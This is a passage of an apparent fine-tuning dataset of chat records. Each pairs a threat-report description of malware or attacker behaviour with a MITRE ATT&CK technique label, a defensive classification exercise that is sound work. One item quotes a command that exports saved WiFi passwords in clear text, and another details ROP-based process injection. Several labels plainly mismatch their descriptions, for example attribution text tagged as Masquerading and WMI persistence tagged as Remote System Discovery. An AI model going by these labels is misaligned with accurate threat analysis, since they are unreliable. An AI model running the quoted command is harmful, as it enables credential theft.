- "content": "Capable of stealing documents sent to the printer queue. Steals written CD images. Capable of stealing files previously seen on removable drives once they are available again. Steals Internet Explorer, Netscape Navigator, FireFox and RealNetworks cookies. If deleted from Frontend file or related registry values, it will reappear after reboot with a new name and startup type"
- },
- {
- "role": "assistant",
- "content": "T1025 - Data from Removable Media"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "attempts to hide its payloads using legitimate filenames."
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "kaudited — A file installed as /usr/bin/kaudited. This binary will drop and install several loadable kernel modules (LKMs) on the infected machine. To ensure that the infected machine won’t crash due to the kernel-mode rootkits, it uses different modules for specific kernel versions. The kaudited binary also drops a watchdog component that will monitor the cryptocurrency miner file and process"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "One of the first steps that several Mosquito installer packages performed after writing and running this local_update js file was to export all local host’s WiFi profiles (settings and passwords) to %APPDATA%\\.xml with a command line call: cmd.exe /c netsh wlan export profile key=clear folder=\"%APPDATA%\" They then gather more network information with a call to ipconfig and arp -a"
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Leviathan has sent spearphishing email links attempting to get a user to click."
- },
- {
- "role": "assistant",
- "content": "T1204.001 - Malicious Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT38 has used PowerShell to execute commands and other operational tasks."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "As mentioned in the Hermes to Ryuk section, Ryuk uses a combination of symmetric (AES) and asymmetric (RSA) encryption to encrypt files. Without the private key provided by WIZARD SPIDER, the files cannot be decrypted and are unrecoverable. A thread is created for the encryption of each file and each file is encrypted with its own AES key. After the file has been encrypted, a file extension of .RYK is appended to the file. All directories will have a ransom note of (RyukReadMe.txt) written to the directory"
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware also monitors all fixed and removable drives mapped on the local system. Whenever a new drive is inserted, it creates a list of all the files on the drive and stores it encrypted in a file"
- },
- {
- "role": "assistant",
- "content": "T1119 - Automated Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group malware IndiaIndia checks Registry keys within HKCU and HKLM to determine if certain applications are present, including SecureCRT, Terminal Services, RealVNC, TightVNC, UltraVNC, Radmin, mRemote, TeamViewer, FileZilla, pcAnyware, and Remote Desktop. Another Lazarus Group malware sample checks for the presence of the following Registry key:\"HKEY_CURRENT_USER\\Software\\Bitcoin\\Bitcoin-Qt\"."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The developer implemented a total of seven techniques to identify if the compromised system is a virtual machine. Additionally, the malware checks the SerialNumber and the version of the BIOS. The third technique uses the Win32_Computer entry in WMI. It checks if the manufacturer contains \"VIRTUAL\", \"VMWARE\" or \"VirtualBox\". The fourth technique checks the Processor ID of the system. The WMI request simply replies \"not supported\". This behaviour can be used to detect if the targeted system is a real machine. The last technique uses the MAC Address of the infected system. If the MAC Address starts by a well-known hexadecimal number, the system is identified as a virtual machine. The variant version of GX is used in the URI"
- },
- {
- "role": "assistant",
- "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "We attribute this campaign with high confidence to an actor named WIRTE, which is a lesser-known threat actor first publicly referenced by our colleagues at Lab52 in 2019. We further suspect, with low confidence, that the WIRTE group has relations with the Gaza Cybergang threat actor"
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AuTo Stealer has the ability to collect the username from an infected host."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Looking at earlier attacks between 2013 and 2016, we believe Comnie was also used in targeted attacks against the following individuals or organizations: Taiwan government IT service vendor in Asia Journalist of a Tibetan radio station Figure 6 Email sent to Journalist of Tibetan radio station Malicious Macros The malicious macro documents used to deliver Comnie initially hide the content inside and requests that the user enables macros prior to viewing the document"
- },
- {
- "role": "assistant",
- "content": "T1598.002 - Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT28 has used Forfiles to locate PDF, Excel, and Word documents during collection. The group also searched a compromised DCCC computer for specific terms."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "POLONIUM has exfiltrated stolen data to POLONIUM-owned OneDrive and Dropbox accounts."
- },
- {
- "role": "assistant",
- "content": "T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group has sent malicious links to victims via email."
- },
- {
- "role": "assistant",
- "content": "T1566.002 - Phishing: Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LoJax has loaded an embedded NTFS DXE driver to be able to access and write to NTFS partitions."
- },
- {
- "role": "assistant",
- "content": "T1564.004 - Hide Artifacts: NTFS File Attributes"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BRONZE BUTLER downloads encoded payloads and decodes them on the victim."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This round of FIN7 phishing lures implements hidden shortcut files (LNK files) to initiate the infection and VBScript functionality launched by mshta.exe to infect the victim"
- },
- {
- "role": "assistant",
- "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Vasport creates a backdoor by making a connection using a HTTP POST."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Hildegard has disguised itself as a known Linux process."
- },
- {
- "role": "assistant",
- "content": "T1036.004 - Masquerading: Masquerade Task or Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LoJax has modified the Registry key \"‘HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\BootExecute’\" from \"‘autocheck autochk *’\" to \"‘autocheck autoche *’\"."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NotPetya can use two exploits in SMBv1, EternalBlue and EternalRomance, to spread itself to other remote systems on the network."
- },
- {
- "role": "assistant",
- "content": "T1210 - Exploitation of Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Creates new users’ accounts"
- },
- {
- "role": "assistant",
- "content": "T1136.001 - Create Account: Local Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "We believe the actor used a cryptor on the payload, as it obtains a filename and script from within its resources and decodes these resources by multiplying each byte by negative one"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Attor's installer plugin can schedule rundll32.exe to load the dispatcher."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SombRAT can use a custom DGA to generate a subdomain for C2."
- },
- {
- "role": "assistant",
- "content": "T1568.002 - Domain Generation Algorithms"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ThreatNeedle can download additional tools to enable lateral movement."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Shamoon has an operational mode for encrypting data instead of overwriting it."
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Frankenstein, the threat actors collected information via Empire, which sent the data back to the adversary's C2."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Saint Bot can deobfuscate strings and files for execution."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Turla has used \"net localgroup\" and \"net localgroup Administrators\" to enumerate group information, including members of the local administrators group."
- },
- {
- "role": "assistant",
- "content": "T1069.001 - Permission Groups Discovery: Local Groups"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sandworm Team has used a tool to query Active Directory using LDAP, discovering information about usernames listed in AD."
- },
- {
- "role": "assistant",
- "content": "T1087.002 - Account Discovery: Domain Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Clicking on the shortcut ultimately leads to Backdoor.Pirpi being downloaded and executed on the affected computer"
- },
- {
- "role": "assistant",
- "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "To execute the main downloaded payload, the loader tries to masquerade as a legitimate Windows service, claiming in its fake description, that it is used to support packed applications"
- },
- {
- "role": "assistant",
- "content": "T1036.004 - Masquerading: Masquerade Task or Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QakBot can maintain persistence by creating an auto-run Registry key."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The adversary used the built-in lateral movement possibilities in Cobalt Strike. Cobalt Strike has various methods for deploying its beacons at newly compromised systems. We have seen the adversary using SMB, named pipes, PsExec, and WinRM. They continue lateral movement and discovery in an attempt to identify the data of interest. This could be a webserver to carve data from memory, or a fileserver to copy IP, as we have both observed"
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Daserf can use steganography to hide malicious code downloaded to the victim."
- },
- {
- "role": "assistant",
- "content": "T1001.002 - Data Obfuscation via Steganography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "InvisiMole has installed legitimate but vulnerable Total Video Player software and wdigest.dll library drivers on compromised hosts to exploit stack overflow and input validation vulnerabilities for code execution."
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A sample of the data that is encrypted and sent to the CnC server for version ‘p=2’ is seen in the memory dump shown in Figure 6. At offset 4-7 it contains a time-based counter. It uses the keyword \"osamu\" in this instance to identify this particular campaign. The campaign keywords are not sent out in version ‘p=1’ but can still be found hardcoded in the DLL payload. The hostname and OS information are also included in the beacon. It awaits further commands from the CnC server in response to the data sent out."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The group has been known to compress data before exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LookBack has used VBA macros in Microsoft Word attachments to drop additional files to the host."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has downloaded additional files, including by using a first-stage downloader to contact the C2 server to obtain the second-stage implant."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Spalax, the threat actors used OneDrive and MediaFire to host payloads."
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Fox Kitten has installed TightVNC server and client on compromised servers and endpoints for lateral movement."
- },
- {
- "role": "assistant",
- "content": "T1021.005 - Remote Services:VNC"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WellMail has been observed using TCP port 25, without using SMTP, to leverage an open port for secure command and control communications."
- },
- {
- "role": "assistant",
- "content": "T1571 - Non-Standard Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gamaredon Group has registered domains to stage payloads."
- },
- {
- "role": "assistant",
- "content": "T1608.001 - Upload Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A module in collects information on available printers and disk drives."
- },
- {
- "role": "assistant",
- "content": "T1120 - Peripheral Device Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MarkiRAT can use BITS Utility to connect with the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1197 - BITS Jobs"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Recently, after looking at the difference between 0vercl0ck’s proof of concept and the real deal, a friend asked me “Why does PowerLoader go to all the trouble of using ROP chains instead of just executing the shellcode like 0vercl0ck does. PowerLoader gets the malicious code into the process by opening an existing, shared section already mapped into explorer, removing the need to allocate heap space or overwrite process memory. By opening “Shell_TrayWnd” and calling SetWindowLong, PowerLoader is able to set a variable used by the window procedure to point to a specific address in its shellcode. The read part won’t trigger DEP (Data Execution Prevention), if the section is not executable (in later versions of windows it is execute-protected), however if EAX points to an address inside the section, DEP will be triggered. Well how does one get from KiUserApcDispatcher to code execution, without executing the non-executable shellcode, I hear you ask. Next it pops the return address into the EAX and then calls it, this results in execution being transferred back to the Window Procedure. The sequences are instruction within the executable regions of explorer’s memory, their purpose is to perform certain operations as PowerLoader can’t execute any of its own code yet, due to the section being execute-protected. 00100E28 points to some code in explorer that executes the instruction “STD” followed by “RET”, As a result the instruction underlined in red will result in the direction flag being set and execution being returned to the Window Procedure. Well these bytes were found, in this case inside some random shell32 function (it doesn’t matter). Now the pointer doesn’t point to the start of the function, it points somewhere in the middle, as a result, only the bytes in the red box are executed. Remember: because all addresses points to executable code within explorer address space, and they are called using a pointer, no code in the shellcode is actually executed, thus resulting in no nasty DEP errors"
- },
- {
- "role": "assistant",
- "content": "T1055.011 - Process Injection: Extra Window Memory Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dridex contains a module for VNC."
- },
- {
- "role": "assistant",
- "content": "T1219 - Remote Access Software"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Execute noninteractive commands on multiple hosts at once"
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Although it has only recently been launched, IcedID already uses redirection attacks. The redirection scheme IcedID uses is not a simple handover to another website with a different URL. Rather, it is designed to appear as seamless as possible to the victim. These tactics include displaying the legitimate bank’s URL in the address bar and the bank’s correct SSL certificate, which is made possible by keeping a live connection with the actual bank’s site"
- },
- {
- "role": "assistant",
- "content": "T1185 - Browser Session Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After successful lateral movement, the attackers tried to establish persistency on selected servers –targeting all domain controllers, but also other servers. To achieve persistency, they used WMI Event Subscription with a few different WMI objects"
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OnionDuke can use a custom decryption algorithm to decrypt strings."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT37 has signed its malware with an invalid digital certificates listed as “Tencent Technology (Shenzhen) Company Limited.”"
- },
- {
- "role": "assistant",
- "content": "T1036.001 - Invalid Code Signature"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kimsuky has deleted the exfiltrated data on disk after transmission. Kimsuky has also used an instrumentor script to terminate browser processes running on an infected system and then delete the cookie files on disk."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group has used rgsvr32 to execute custom malware."
- },
- {
- "role": "assistant",
- "content": "T1218.010 - Signed Binary Proxy Execution: Regsvr32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "lists running processes."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chinese state-sponsored cyber actors have been observed using tools like dog-tunnel and dns2tcp.exe to conceal C2 traffic with existing network activity."
- },
- {
- "role": "assistant",
- "content": "T1572 - Protocol Tunneling"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WinMM collects the system name, OS version including service pack, and system install date and sends the information to the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dtrack has used \"cmd.exe\" to add a persistent service."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SpeakUp uses cron tasks to ensure persistence."
- },
- {
- "role": "assistant",
- "content": "T1053.003 - Scheduled Task/Job: Cron"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bad Rabbit can enumerate all running processes to compare hashes."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gain access to the victim’s network by logging into a public-facing system via Secure Shell (SSH) using a local account <user sftp> acquired during previous credential theft activities. Use port forwarding capabilities built into SSH on the public-facing system to establish a Remote Desktop Protocol (RDP) session to an internal server (Server 1) using a domain service account. From Server 1, establish another RDP session to a different internal server (Server 2) using a domain administrator’s account"
- },
- {
- "role": "assistant",
- "content": "T1021.001 - Remote Services: Remote Desktop Protocol', 'T1090.001 - Proxy: Internal Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Aria-body has used ZIP to compress data gathered on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "These are in-line with the targeting of the victims witnessed by the attackers using Conmie"
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Microsoft by default disables the dynamic execution of the macro, and if an attacker needs to execute one dynamically—which is the case here—the threat actor needs to bypass the VB object model (VBOM) by modifying its registry value"
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
